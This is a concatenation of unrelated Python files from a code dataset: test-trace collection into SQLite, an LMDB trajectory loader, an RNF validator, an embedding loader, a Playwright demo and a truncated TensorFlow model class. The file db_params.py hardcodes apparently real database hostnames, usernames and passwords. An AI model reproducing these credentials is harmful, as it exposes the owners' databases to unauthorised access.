@ignore)\n continue\n methodname_w_brackets = list(filter(lambda w: '(' in w, line_split))[0]\n methodname = methodname_w_brackets[:-2]\n tmethod_names.append(methodname)\n return tmethod_names\n\n @classmethod\n def parse_and_return_methodnameTannotations(cls, java_test_file_path):\n with open(java_test_file_path, 'r') as tfile:\n tree = cls.parser.parse_file(tfile)\n for type_decl in tree.type_declarations:\n methodnameTannotations = [] #(method_name, ['Test', 'Deprecated'])\n for method_decl in [decl for decl in type_decl.body if type(decl) is model.MethodDeclaration]:\n annotations = []\n for modifier in method_decl.modifiers:\n if type(modifier) is model.Annotation:\n annotations.append(modifier.name.value)\n methodnameTannotations.append((method_decl.name, annotations))\n return methodnameTannotations\n\n\ndef run_test(test_class_name, test_method_name):\n '''\n Example:\n test_class_name = FunctionUtilsTest\n test_method_name = testCompose\n '''\n command = f\"mvn surefire:test -Dtest={test_class_name}#{test_method_name}\"\n command = command.split(' ')\n logger.debug(f\"handling {test_class_name}, {test_method_name}\")\n output = subprocess.run(command, stdout=subprocess.PIPE, shell=True, cwd=PROJECT_ROOT_PATH)\n surefire_output = output.stdout.decode(encoding='utf-8', errors='ignore')\n return surefire_output\n\ndef route_traces_to_test_folder(tfile_name, tmethod_name):\n test_dir = f\"{DATA_PATH}\\\\{tfile_name}\\\\{tmethod_name}\"\n if not os.path.exists(test_dir):\n os.makedirs(test_dir)\n copyfile(src=TRACES_LOG_FILE_PATH, dst=f\"{test_dir}\\\\test_method_traces.log\")\n os.remove(TRACES_LOG_FILE_PATH)\n\ndef get_methodset_for_tmethod_traces(tmethod_dir_path): \n methodset = set()\n with open(f\"{tmethod_dir_path}\\\\test_method_traces.log\", 'r') as tmethod_file:\n for trace in tmethod_file:\n methodset.add(trace.split(',')[0])\n return methodset\n\ndef create_tmethod_info_files(tsuit_info):\n for tinfo in tsuit_info.tinfos:\n tmethod_dir_path = f\"{DATA_PATH}\\\\{tinfo.tfile_name}\\\\{tinfo.tmethod_name}\"\n methodset = get_methodset_for_tmethod_traces(tmethod_dir_path)\n with open(f\"{tmethod_dir_path}\\\\tmethod_info.log\", 'w') as tmethod_info_file:\n info = dict()\n info[\"methodset\"] = []\n for method in methodset:\n info[\"methodset\"].append(method)\n info[\"isFaulty\"] = tinfo.is_faulty\n tmethod_info_file.write(json.dumps(info))\n\ndef ingest_outcomes_into_sqlite(db, tsuit_info, map_from_methodfullname_to_guid):\n outcomes = [(map_from_methodfullname_to_guid[tinfo.tmethod_fullname], int(tinfo.is_faulty)) for tinfo in tsuit_info.tinfos]\n cursor.executemany('''INSERT INTO outcomes(tmid, is_faulty)\n VALUES(?,?)''', outcomes)\n db.commit()\n\ndef create_generator_from_logs(tmid, logs, map_from_methodfullname_to_guid):\n for log in logs:\n trace = Trace(tmid, log)\n trace.tmid = map_from_methodfullname_to_guid[trace.tmid]\n if trace.mid not in map_from_methodfullname_to_guid:\n map_from_methodfullname_to_guid[trace.mid] = str(uuid.uuid4())\n trace.mid = map_from_methodfullname_to_guid[trace.mid]\n yield (trace.tmid, trace.mid, trace.vector)\n\ndef ingest_traces_into_sqlite(db, tsuit_info, map_from_methodfullname_to_guid):\n for logfilename in glob.iglob(r\"C:\\personal-git\\Thesis\\ThesisScripts\\data\\**\\*.log\", recursive=True):\n tmid = '.'.join(logfilename.split('\\\\')[-3:-1])\n with open(logfilename, mode=\"r\") as logs:\n traces_generator = create_generator_from_logs(tmid, logs, map_from_methodfullname_to_guid)\n cursor.executemany('''INSERT INTO traces(tmid, 
mid, vector)\n VALUES(?,?,?)''', traces_generator)\n db.commit()\n\ndef ingest_methods_into_sqlite(db, map_from_methodfullname_to_guid):\n #flipping (method_id, method_name) intentionally\n values = [(method_id, method_name) for (method_name, method_id) in map_from_methodfullname_to_guid.items()]\n cursor.executemany('''INSERT INTO methods(method_id, method_name)\n VALUES(?,?)''', values)\n db.commit()\n\nlogger.info(\"\\n\\nstart\\n=================================================================================\\n\")\n\n\n#Step 1 (manual): introduce bug then `mvn package`\nBUG_ID = 1\nBUG_DESC = \"off by one in analysis/differentiation/GradientFunction.java\"\n\n#Step 2 (manual): find test classes that contain at least one failing test\n#build the project & run the the suite without the tracer (`mvn surefire:test`)\n#add every failing test class to TC_LIST\nTC_LIST = [ \n r\"C:\\personal-git\\apache\\commons-math\\src\\test\\java\\org\\apache\\commons\\math4\\analysis\\differentiation\\DerivativeStructureTest.java\"\n ]\n\n#Step 3: create SQLITE dataset\n#add the agent to the pom\n#Step 3.1: analyzing test-suit (create TestSuitInformation)\nstep1_desc = \"step 3.1: analyzing test-suit\"\nlogger.info(f\"\\n\\n{step1_desc}\\n=================================================================================\\n\")\nlogger.info(\"populating test-suit-information\")\n#populate test suit (get all test methods inside every test file)\ntsuit_info = TestSuitInformation(TC_LIST)\nlogger.info(f\"found total of {len(tsuit_info.tinfos)} methods in test suit\")\nlogger.info(\"filtering in only valid tests (e.g. only @Tests without @Deprecated or @Ignore)\")\ntsuit_info.filter_in_valid_tests()\nlogger.info(f\"total of {len(tsuit_info.tinfos)} valid test methods\")\n#Step 3.2: invoking individual tests with tracer\nstep2_desc = \"step 3.2: invoking individual tests with tracer\"\nlogger.info(f\"\\n\\n{step2_desc}\\n=================================================================================\\n\")\n#run each test to get results\npbar = ProgressBar(len(tsuit_info.tinfos))\npbar.show_current()\nfor tinfo in tsuit_info.tinfos:\n output = run_test(tinfo.tfile_name, tinfo.tmethod_name)\n tinfo.add_result_from_output(output)\n route_traces_to_test_folder(tinfo.tfile_name, tinfo.tmethod_name)\n pbar.advance(f\"({tinfo.tfile_name}, {tinfo.tmethod_name})\")\nlogger.info(f'each test class and test method tracer were stored at: \"{DATA_PATH}\"')\n#Step 3.3 filter (sample) tmethods with too many traces\nstep3_desc = f\"step 3.3: filter (sample) tmethods with traces bigger than {MAX_SIZE_FOR_TRACE_FILE_IN_MB} MB\"\nlogger.info(f\"\\n\\n{step3_desc}\\n=================================================================================\\n\")\nfiltered_count = tsuit_info.filter_out_big_trace_files(MAX_SIZE_FOR_TRACE_FILE_IN_MB)\nlogger.info(f'{filtered_count} tmethods were filtered (sampled) due to their size')\n#Step 3.4 output to SQLITE\nstep4_desc = \"step 3.4: output to sqlite\"\nlogger.info(f\"\\n\\n{step4_desc}\\n=================================================================================\\n\")\n#Step 3.4.1 setup SQLITE\nlogger.info(\"setting up SQLITE storage\")\ndb = sqlite3.connect(f\"{BUG_DBS_PATH}\\\\{BUG_ID}\")\ncursor = db.cursor()\ncursor.execute('''\n CREATE TABLE outcomes(\n tmid TEXT PRIMARY KEY, \n is_faulty INTEGER\n )\n''')\ndb.commit()\ncursor.execute('''\n CREATE TABLE traces(\n tmid TEXT, \n mid TEXT, \n vector TEXT, \n FOREIGN KEY(tmid) REFERENCES outcomes(tmid)\n 
)\n''')\ndb.commit()\ncursor.execute('''\n CREATE TABLE methods(\n method_id TEXT PRIMARY KEY, \n method_name TEXT\n )\n''')\ndb.commit()\n#Step 3.4.2 ingest\nmap_from_methodfullname_to_guid = dict()\nfor tinfo in tsuit_info.tinfos:\n if tinfo.tmethod_fullname not in map_from_methodfullname_to_guid:\n map_from_methodfullname_to_guid[tinfo.tmethod_fullname] = str(uuid.uuid4())\ningest_outcomes_into_sqlite(db, tsuit_info, map_from_methodfullname_to_guid)\ningest_traces_into_sqlite(db, tsuit_info, map_from_methodfullname_to_guid)\ningest_methods_into_sqlite(db, map_from_methodfullname_to_guid)\ndb.close()\nrmtree(DATA_PATH)","sub_path":"flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":13867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"647707102","text":"'''\nData structure of the input .npz:\nthe data is save in python dictionary format with keys: 'acs', 'ep_rets', 'rews', 'obs'\nthe values of each item is a list storing the expert trajectory sequentially\na transition can be: (data['obs'][t], data['acs'][t], data['obs'][t+1]) and get reward data['rews'][t]\n'''\n\nfrom baselines import logger\nimport numpy as np\nimport lmdb\nimport pickle\n\nimport os.path\nimport random\n\n\nclass LMDB_Dset(object):\n def __init__(self, expert_path, train_fraction=0.99, traj_limitation=-1, randomize=True):\n super(LMDB_Dset, self).__init__()\n self.data_path = expert_path\n self.train_fraction = train_fraction\n self.shuffle = randomize\n # Open the LMDB file\n with lmdb.open(self.data_path,\n readonly=True,\n lock=False,\n meminit=False) as env:\n\n with env.begin(write=False) as txn:\n self.demos_path = pickle.loads(txn.get(b'__demo_path__'))\n\n with lmdb.open(self.demos_path,\n readonly=True,\n lock=False,\n meminit=False) as env:\n\n with env.begin(write=False) as txn:\n self.keys = pickle.loads(txn.get(b'__keys__'))\n self.keys = sorted(self.keys, key=lambda x: -1 * pickle.loads(txn.get(x))['return'])\n self.length = len(self.keys)\n\n self.demo_env = None\n\n self.train_shuffled = [i for i in range(int(self.length*self.train_fraction))]\n self.eval_shuffled = [i for i in range(int(self.length - self.length*self.train_fraction))]\n self.shuffled = [i for i in range(self.length)]\n\n self.train_pointer = 0\n self.eval_pointer = 0\n self.pointer = 0\n\n def get_next_batch(self, batch_size, split=None):\n if split is None:\n inds = self.shuffled[self.pointer:self.pointer+batch_size]\n self.pointer += batch_size\n if self.pointer > len(self.shuffled):\n self.pointer = 0\n random.shuffle(self.shuffled)\n elif split == 'train':\n inds = self.train_shuffled[self.train_pointer:self.train_pointer+batch_size]\n self.train_pointer += batch_size\n if self.train_pointer > len(self.train_shuffled):\n self.train_pointer = 0\n random.shuffle(self.train_shuffled)\n elif split == 'val':\n inds = self.eval_shuffled[self.eval_pointer:self.eval_pointer+batch_size]\n self.eval_pointer += batch_size\n if self.eval_pointer > len(self.eval_shuffled):\n self.eval_pointer = 0\n random.shuffle(self.eval_shuffled)\n else:\n raise NotImplementedError\n\n samples = [self[idx] for idx in inds]\n\n states, actions = list(zip(*samples))\n\n return np.transpose(np.concatenate(states), (0, 3, 1, 2)), np.concatenate(actions)\n\n\n def __getitem__(self, idx):\n if self.demo_env is None:\n self.demo_env = lmdb.open(self.demos_path,\n readonly=True,\n lock=False,\n meminit=False)\n\n with self.demo_env.begin(write=False) as txn:\n traj = 
pickle.loads(txn.get(self.keys[idx]))\n\n states = traj['states']\n actions = traj['actions']\n\n states = np.array(states, dtype=np.float32)/255.0\n actions = np.array(actions, dtype=np.int32)\n\n return states, actions\n\n\n\n\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--expert_path\", type=str, default=\"../data/deterministic.trpo.Hopper.0.00.npz\")\n parser.add_argument(\"--traj_limitation\", type=int, default=None)\n parser.add_argument(\"--plot\", type=bool, default=False)\n args = parser.parse_args()\n print(args)\n","sub_path":"atari/baselines/baselines/gail/dataset/lmdb_dset.py","file_name":"lmdb_dset.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"518572960","text":"import rnftools.rnfformat\nimport re\n\nreg_lrn = re.compile(r\"^([!-?A-^`-~]*)__([0-9a-f]+)__([!-?A-^`-~]+)__([!-?A-^`-~]*)$\")\nreg_prefix_part = re.compile(r\"^[!-?A-^`-~]*$\")\nreg_id_part = re.compile(r\"^[0-9a-f]+$\")\nreg_segmental_part = re.compile(r\"^(?:(\\([0-9FRN,]*\\))(?:,(?!$)|$))+$\")\nreg_suffix_part = re.compile(r\"^(?:((?:[a-zA-Z0-9]+:){0,1})\\[([!-?A-Z\\\\^`-~]*)\\](?:,(?!$)|$))+$\")\nreg_segment = re.compile(r\"^\\(([0-9]+),([0-9]+),([FRN]),([0-9]+),([0-9]+)\\)$\")\nreg_comment = re.compile(r\"^\\[([!-?A-Z\\\\^`-~]*)\\]$\")\nreg_extension = re.compile(r\"^\\[([!-?A-Z\\\\^`-~]*)\\]$\")\n\n\nclass Validator:\n\t\"\"\"Class for validation of RNF.\n\n\tArgs:\n\t\tinitial_read_tuple_name (str): Initial read tuple name to detect profile (widths).\n\t\treport_only_first (bool): Report only first occurrence of every error.\n\t\twarnings_as_errors (bool): Treat warnings as errors (error code).\n\t\"\"\"\n\n\tdef __init__(\n\t\t\tself,\n\t\t\tinitial_read_tuple_name,\n\t\t\treport_only_first=True,\n\t\t\twarnings_as_errors=False,\n\t):\n\t\tself.report_only_first = report_only_first\n\t\tself.reported_errors = set()\n\t\tself.error_has_been_reported = False\n\t\tself.warning_has_been_reported = False\n\t\tself.warnings_as_errors = warnings_as_errors\n\n\t\tself.rnf_profile = rnftools.rnfformat.RnfProfile(read_tuple_name=initial_read_tuple_name)\n\n\tdef validate(self, read_tuple_name):\n\t\t\"\"\"Check RNF validity of a read tuple.\n\n\t\tArgs:\n\t\t\tread_tuple_name (str): Read tuple name to be checked.s\n\t\t\"\"\"\n\t\tif reg_lrn.match(read_tuple_name) is None:\n\t\t\tself.report_error(\n\t\t\t\tread_tuple_name=read_tuple_name,\n\t\t\t\terror_name=\"wrong_read_tuple_name_structure\",\n\t\t\t\tmessage=\"'{}' is not matched\".format(reg_lrn),\n\t\t\t)\n\t\telse:\n\t\t\tparts = read_tuple_name.split(\"__\")\n\n\t\t\tif reg_prefix_part.match(parts[0]) is None:\n\t\t\t\tself.report_error(\n\t\t\t\t\tread_tuple_name=read_tuple_name,\n\t\t\t\t\terror_name=\"wrong_prefix_part\",\n\t\t\t\t\tmessage=\"'{}' is not matched\".format(reg_prefix_part),\n\t\t\t\t)\n\n\t\t\tif reg_id_part.match(parts[1]) is None:\n\t\t\t\tself.report_error(\n\t\t\t\t\tread_tuple_name=read_tuple_name,\n\t\t\t\t\terror_name=\"wrong_id_part\",\n\t\t\t\t\tmessage=\"'{}' is not matched\".format(reg_id_part),\n\t\t\t\t)\n\n\t\t\tif reg_segmental_part.match(parts[2]) is None:\n\t\t\t\tself.report_error(\n\t\t\t\t\tread_tuple_name=read_tuple_name,\n\t\t\t\t\terror_name=\"wrong_segmental_part\",\n\t\t\t\t\tmessage=\"'{}' is not matched\".format(reg_segmental_part),\n\t\t\t\t)\n\n\t\t\tif reg_suffix_part.match(parts[3]) is 
None:\n\t\t\t\tself.report_error(\n\t\t\t\t\tread_tuple_name=read_tuple_name,\n\t\t\t\t\terror_name=\"wrong_suffix_part\",\n\t\t\t\t\tmessage=\"'{}' is not matched\".format(reg_suffix_part),\n\t\t\t\t)\n\n\t\t\tif not self.rnf_profile.check(read_tuple_name):\n\t\t\t\tself.report_error(\n\t\t\t\t\tread_tuple_name=read_tuple_name,\n\t\t\t\t\terror_name=\"wrong_profile\",\n\t\t\t\t\tmessage=\"Read has a wrong profile (wrong widths). It should be: {} but it is: {}.\".format(\n\t\t\t\t\t\tself.rnf_profile,\n\t\t\t\t\t\trnftools.rnfformat.RnfProfile(read_tuple_name=read_tuple_name),\n\t\t\t\t\t),\n\t\t\t\t\twarning=True,\n\t\t\t\t)\n\n\tdef get_return_code(self):\n\t\t\"\"\"Get final return code (0 = ok, 1 = error appeared).\n\t\t\"\"\"\n\t\tif self.error_has_been_reported:\n\t\t\treturn 1\n\t\tif self.warning_has_been_reported and self.warnings_as_errors:\n\t\t\treturn 1\n\t\treturn 0\n\n\tdef report_error(\n\t\t\tself,\n\t\t\tread_tuple_name,\n\t\t\terror_name,\n\t\t\twrong=\"\",\n\t\t\tmessage=\"\",\n\t\t\twarning=False\n\t):\n\t\t\"\"\"Report an error.\n\n\t\tArgs:\n\t\t\tread_tuple_name (str): Name of the read tuple.\n\t\t\terror_name (str): Name of the error.\n\t\t\twrong (str): What is wrong.\n\t\t\tmessage (str): Additional message to be printed.\n\t\t\twarning (bool): Warning (not an error).\n\t\t\"\"\"\n\t\tif (not self.report_only_first) or (error_name not in self.reported_errors):\n\t\t\tprint(\"\\t\".join([\"error\" if warning == False else \"warning\", read_tuple_name, error_name, wrong, message]))\n\t\tself.reported_errors.add(error_name)\n\t\tif warning:\n\t\t\tself.warning_has_been_reported = True\n\t\telse:\n\t\t\tself.error_has_been_reported = True\n","sub_path":"rnftools/rnfformat/Validator.py","file_name":"Validator.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"300552189","text":"import numpy as np\nimport pickle, codecs\n\ndef BioAsqtypes2word2iddict(typestxtpath):\n word2id = {}\n id2word = {}\n\n with open(typestxtpath,'r') as tyt:\n for line in tyt:\n oneword = line.strip()\n\n word2id[oneword] = len(word2id)\n id2word[(len(id2word))] = oneword\n word2id['<UNK>'] = len(word2id)\n id2word[len(id2word)] = '<UNK>'\n\n word2id['<PAD>'] = len(word2id)\n id2word[len(id2word)] = '<PAD>'\n\n return word2id, id2word\n\ndef BioAsQ2array(embeddingvectorpath,word2id_dic, id2word_dic):\n word2embeddict = {}\n word_embeds_init_matrix = np.random.uniform(-np.sqrt(0.06), np.sqrt(0.06), (len(word2id_dic), 200))\n word_embeds_init_matrix[-1][0:200] = np.array([0 for i in range(200)])\n\n\n for i, line in enumerate(codecs.open(embeddingvectorpath, 'r', encoding='utf-8')):\n s = line.strip().split()\n word2embeddict[id2word_dic[i]] = np.array([float(j) for j in s[0:]])\n # dimension = 200\n\n return word2embeddict, word_embeds_init_matrix\n\nif __name__ == '__main__':\n TYPESTXTPATH = './../pretrained_embeddings/embeddings_BioAsQ/types.txt'\n EMBEDTXTPATH = './../pretrained_embeddings/embeddings_BioAsQ/vectors.txt'\n\n word2id, id2word = BioAsqtypes2word2iddict(typestxtpath=TYPESTXTPATH)\n word2embeddingdict, wordmatrix = BioAsQ2array(embeddingvectorpath=EMBEDTXTPATH,\n word2id_dic=word2id,\n id2word_dic=id2word)\n bioasq_embeddingpath = './../pretrained_embeddings/embeddings_BioAsQ/bioasq_allembedding.pkl'\n\n with open(bioasq_embeddingpath,'wb') as be:\n all_data_json = {'word2id':word2id,\n 'id2word':id2word,\n 'word2embed':word2embeddingdict,\n 'wordmatrix':wordmatrix}\n pickle.dump(all_data_json,be)\n 
print('dump end')\n\n\n\n","sub_path":"CRAFT2GO/BioAsQembeddingloader.py","file_name":"BioAsQembeddingloader.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"382357257","text":"#!/usr/bin/env python\n\n# Author: Steven Dang stevencdang.com\n\n########## MongoHQ databases ##############\n# Need to modify this so that the user and password are stored separately\nideagenstest = {'url': \"kahana.mongohq.com\",\n 'port': 10056,\n 'dbName': 'IdeaGensTest',\n 'user': 'sandbox',\n 'pswd': 'protolab1'\n }\n# user and pswd are incorrect (we do not want to commit secure info)\nideagensscd = {'url': \"ds045031.mongolab.com\",\n 'port': 45031,\n 'dbName': 'ideagensscd',\n 'user': 'heroku',\n 'pswd': 'j4!g#RV$nAr5&FBq$BK$',\n }\n\nideagens = {'url': \"kahana.mongohq.com\",\n 'port': 10075,\n 'dbName': 'IdeaGens',\n 'user': 'experimenter',\n 'pswd': '1#dJ3VYSf8Sn5iE9'\n }\n\nchi1 = {'url': \"kahana.mongohq.com\",\n 'port': 10010,\n 'dbName': 'CHI1',\n 'user': 'proto1',\n 'pswd': 'lTwI9iiTm7'\n }\n\nfac_exp = {'url': \"ds043981.mongolab.com\",\n 'port': 43981,\n 'dbName': 'joelcprotolab',\n 'user': 'joelc',\n 'pswd': 'lnC00K=beta{5}'\n }\n\nhumandatabank = {'url': \"ds041327.mongolab.com\",\n 'port': 41327,\n 'dbName': 'human_data_bank',\n 'user': 'heroku',\n 'pswd': 'j4!g#RV$nAr5&FBq$BK$',\n }\n\nsynth_exp = {'url': \"ds033097.mongolab.com\",\n 'port': 33097,\n 'dbName': 'joelc-ideagens2',\n 'user': 'joelc',\n 'pswd': 'lnC00K=beta{5}'\n }\n\nkalign = {'url': \"ds055535.mlab.com\",\n 'port': 55535,\n 'dbName': 'kalign',\n 'user': 'joelc',\n 'pswd': 'lnC00K=beta{5}'\n }\n\n# Info for connecting to a local instance of meteor's mongo.\n# Meteor must be running to connect\nlocal_meteor = {'url': \"localhost\",\n 'port': 3001,\n 'dbName': 'meteor',\n 'user': '',\n 'pswd': '',\n}\n\nALL_DBs = {'ideagens': ideagens,\n 'ideagenstest': ideagenstest,\n 'chi1': chi1,\n 'fac_exp': fac_exp,\n 'local': local_meteor,\n 'ideagensscd': ideagensscd,\n 'synth_exp': synth_exp,\n 'kalign': kalign,\n 'local_meteor': local_meteor,\n }\n\n","sub_path":"private/scripts/db_params.py","file_name":"db_params.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"641944500","text":"import re\nfrom playwright.sync_api import Playwright, sync_playwright, expect\n\n\ndef run(playwright: Playwright) -> None:\n browser = playwright.chromium.launch(headless=False)\n context = browser.new_context()\n page = context.new_page()\n page.goto(\"https://playwright.dev/\")\n # Expect a title \"to contain\" a substring.\n expect(page).to_have_title(re.compile(\"Playwright\"))\n # create a locator\n get_started = page.get_by_role(\"link\", name=\"Get started\")\n # Expect an attribute \"to be strictly equal\" to the value.\n expect(get_started).to_have_attribute(\"href\", \"/docs/intro\")\n # Click the get started link.\n get_started.click()\n page.wait_for_timeout(3000)\n # Expects the URL to contain intro.\n expect(page).to_have_url(re.compile(\".*intro\"))\n\n # ---------------------\n context.close()\n browser.close()\n\n\nwith sync_playwright() as playwright:\n run(playwright)\n\n\n# ---------------------\n","sub_path":"demo_plawwright.py","file_name":"demo_plawwright.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"244193489","text":"# -*- coding: utf-8 
-*-\n\"\"\"\nDefines mneflow.models.Model parent class and the implemented models as its\nsubclasses. Implemented models inherit basic methods from the parent class.\n\n\"\"\"\nfrom .layers import ConvDSV, Dense, vgg_block, LFTConv, VARConv, DeMixing\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.covariance import ledoit_wolf\n\n\nclass Model(object):\n \"\"\"\n Parent class for all MNEflow models\n\n Provides fast and memory-efficient data handling and simplified API.\n Custom models can be built by overriding _build_graph and\n set_optimizer methods.\n\n \"\"\"\n def __init__(self, Dataset, Optimizer, specs):\n \"\"\"\n Parameters\n -----------\n Dataset : mneflow.Dataset\n Dataset object.\n\n Optimizer : mneflow.Optimizer\n Optimizer object.\n\n specs : dict\n dictionary of model-specific hyperparameters. Must include at\n least model_path - path for saving a trained model. See\n subclass definitions for details.\n\n \"\"\"\n\n self.specs = specs\n self.model_path = specs['model_path']\n if Dataset.h_params['task'] == 'classification':\n self.n_classes = Dataset.h_params['n_classes']\n else:\n self.y_shape = Dataset.h_params['y_shape']\n self.fs = Dataset.h_params['fs']\n self.sess = tf.Session()\n self.handle = tf.placeholder(tf.string, shape=[])\n self.train_iter, self.train_handle = self._start_iterator(Dataset.train)\n self.val_iter, self.val_handle = self._start_iterator(Dataset.val)\n\n self.iterator = tf.data.Iterator.from_string_handle(self.handle, Dataset.train.output_types, Dataset.train.output_shapes)\n self.X, self.y_ = self.iterator.get_next()\n self.rate = tf.placeholder(tf.float32, name='rate')\n self.dataset = Dataset\n self.optimizer = Optimizer\n\n def _start_iterator(self, Dataset):\n\n \"\"\"\n Builds initializable iterator and string handle.\n \"\"\"\n\n ds_iterator = Dataset.make_initializable_iterator()\n handle = self.sess.run(ds_iterator.string_handle())\n self.sess.run(ds_iterator.initializer)\n return ds_iterator, handle\n\n def build(self):\n\n \"\"\"\n Compile a model\n\n \"\"\"\n\n # Initialize computational graph\n self.y_pred = self.build_graph()\n print('y_pred:', self.y_pred.shape)\n # Initialize optimizer\n self.saver = tf.train.Saver(max_to_keep=1)\n opt_handles = self.optimizer.set_optimizer(self.y_pred, self.y_)\n self.train_step, self.accuracy, self.cost, self.p_classes = opt_handles\n print('Initialization complete!')\n\n def build_graph(self):\n\n \"\"\"\n Build computational graph using defined placeholder self.X as input\n\n Can be overriden in a sub-class for customized architecture.\n\n Returns\n --------\n y_pred : tf.Tensor\n output of the forward pass of the computational graph.\n prediction of the target variable\n\n \"\"\"\n print('Specify a model. Set to linear classifier!')\n fc_1 = Dense(size=self.n_classes, nonlin=tf.identity,\n dropout=self.rate)\n y_pred = fc_1(self.X)\n return y_pred\n\n def train(self, n_iter, eval_step=250, min_delta=1e-6, early_stopping=3):\n \"\"\"\n Trains a model\n\n Parameters\n -----------\n\n n_iter : int\n maximum number of training iterations.\n\n eval_step : int\n How often to evaluate model performance during training.\n\n early_stopping : int\n Patience parameter for early stopping. 
Specifies the number of\n 'eval_step's during which validation cost is allowed to rise\n before training stops.\n\n min_delta : float\n Convergence threshold for validation cost during training.\n Defaults to 0.\n \"\"\"\n self.sess.run(tf.global_variables_initializer())\n min_val_loss = np.inf\n\n patience_cnt = 0\n for i in range(n_iter+1):\n _, t_loss, acc = self.sess.run([self.train_step, self.cost, self.accuracy],\n feed_dict={self.handle: self.train_handle,\n self.rate: self.specs['dropout']})\n if i % eval_step == 0:\n self.dataset.train.shuffle(buffer_size=10000)\n self.v_acc, v_loss = self.sess.run([self.accuracy, self.cost],\n feed_dict={self.handle: self.val_handle,\n self.rate: 1.})\n\n if min_val_loss >= v_loss + min_delta:\n min_val_loss = v_loss\n v_acc = self.v_acc\n self.saver.save(self.sess, ''.join([self.model_path,\n self.scope, '-',\n self.dataset.h_params['data_id']]))\n else:\n patience_cnt += 1\n print('* Patience count {}'.format(patience_cnt))\n if patience_cnt >= early_stopping:\n print(\"early stopping...\")\n self.saver.restore(self.sess, ''.join([self.model_path,\n self.scope, '-',\n self.dataset.h_params['data_id']]))\n print('stopped at: epoch %d, val loss %g, val acc %g'\n % (i, min_val_loss, v_acc))\n break\n print('i %d, tr_loss %g, tr_acc %g v_loss %g, v_acc %g'\n % (i, t_loss, acc, v_loss, self.v_acc))\n\n def load(self):\n \"\"\"\n Loads a pretrained model\n\n To load a specific model the model object should be initialized using\n the corresponding metadata and computational graph\n \"\"\"\n\n self.saver.restore(self.sess, ''.join([self.model_path,\n self.scope, '-',\n self.dataset.h_params['data_id']]))\n self.v_acc = self.sess.run([self.accuracy],\n feed_dict={self.handle: self.val_handle,\n self.rate: 1.})\n\n def evaluate_performance(self, data_path, batch_size=None):\n \"\"\"\n Compute performance metric on a TFR dataset specified by path\n\n Parameters\n ----------\n data_path : str, list of str\n path to .tfrecords file(s).\n\n batch_size : NoneType, int\n whether to split the dataset into batches.\n \"\"\"\n test_dataset = self.dataset._build_dataset(data_path,\n n_batch=batch_size)\n test_iter, test_handle = self._start_iterator(test_dataset)\n acc = self.sess.run(self.accuracy, feed_dict={self.handle: test_handle,\n self.rate: 1.})\n print('Finished: acc: %g +\\\\- %g' % (np.mean(acc), np.std(acc)))\n return np.mean(acc)\n\n def predict(self, data_path=None, batch_size=None):\n \"\"\"\n Compute performance metric on a TFR dataset specified by path\n\n Parameters\n ----------\n data_path : str, list of str\n path to .tfrecords file(s).\n\n batch_size : NoneType, int\n whether to split the dataset into batches.\n \"\"\"\n if data_path:\n test_dataset = self.dataset._build_dataset(data_path,\n n_batch=batch_size)\n test_iter, test_handle = self._start_iterator(test_dataset)\n else:\n test_iter, test_handle = self._start_iterator(self.dataset.val)\n pred, true = self.sess.run([self.y_pred, self.y_],\n feed_dict={self.handle: test_handle,\n self.rate: 1.})\n return pred, true\n\n# def evaluate_realtime(self, data_path, batch_size=None, step_size=1):\n#\n# \"\"\"Compute performance metric on a TFR dataset specified by path\n# batch by batch with updating the model after each batch \"\"\"\n#\n# prt_batch_pred = []\n# prt_logits = []\n# n_test_points = batch_size//step_size\n# count = 0\n#\n# test_dataset = tf.data.TFRecordDataset(data_path).map(self._parse_function)\n# test_dataset = test_dataset.batch(step_size)\n# test_iter = 
test_dataset.make_initializable_iterator()\n# self.sess.run(test_iter.initializer)\n# test_handle = self.sess.run(test_iter.string_handle())\n#\n# while True:\n# try:\n# self.load()\n# count += 1\n# preds = 0\n# for jj in range(n_test_points):\n# pred, probs = self.sess.run([self.correct_prediction,\n# self.p_classes],\n# feed_dict={self.handle: test_handle,\n# self.rate: 1})\n# self.sess.run(self.train_step,\n# feed_dict={self.handle: test_handle,\n# self.rate: self.specs['dropout']})\n# preds += np.mean(pred)\n# prt_logits.append(probs)\n# prt_batch_pred.append(preds/n_test_points)\n# except tf.errors.OutOfRangeError:\n# print('prt_done: count: %d, acc: %g +\\\\- %g'\n# % (count, np.mean(prt_batch_pred), np.std(prt_batch_pred)))\n# break\n# return prt_batch_pred, np.concatenate(prt_logits)\n\n def plot_cm(self, dataset='validation', class_names=None, normalize=False):\n\n \"\"\"\n Plot a confusion matrix\n\n Parameters\n ----------\n\n dataset : str {'training', 'validation'}\n which dataset to use for plotting confusion matrix\n\n class_names : list of str, optional\n if provided, used to label the classes; otherwise numeric\n class labels are used\n\n normalize : bool\n whether to return percentages (if True) or counts (False)\n \"\"\"\n\n from matplotlib import pyplot as plt\n from sklearn.metrics import confusion_matrix\n import itertools\n if dataset == 'validation':\n feed_dict = {self.handle: self.val_handle, self.rate: 1.}\n elif dataset == 'training':\n feed_dict = {self.handle: self.train_handle, self.rate: 1.}\n else:\n raise ValueError(\"dataset must be 'training' or 'validation'\")\n y_true, y_pred = self.sess.run([self.y_, self.p_classes],\n feed_dict=feed_dict)\n y_pred = np.argmax(y_pred, 1)\n f = plt.figure()\n cm = confusion_matrix(y_true, y_pred)\n title = 'Confusion matrix'\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\n plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)\n plt.title(title)\n ax = f.gca()\n ax.set_ylabel('True label')\n ax.set_xlabel('Predicted label')\n plt.colorbar()\n if not class_names:\n class_names = 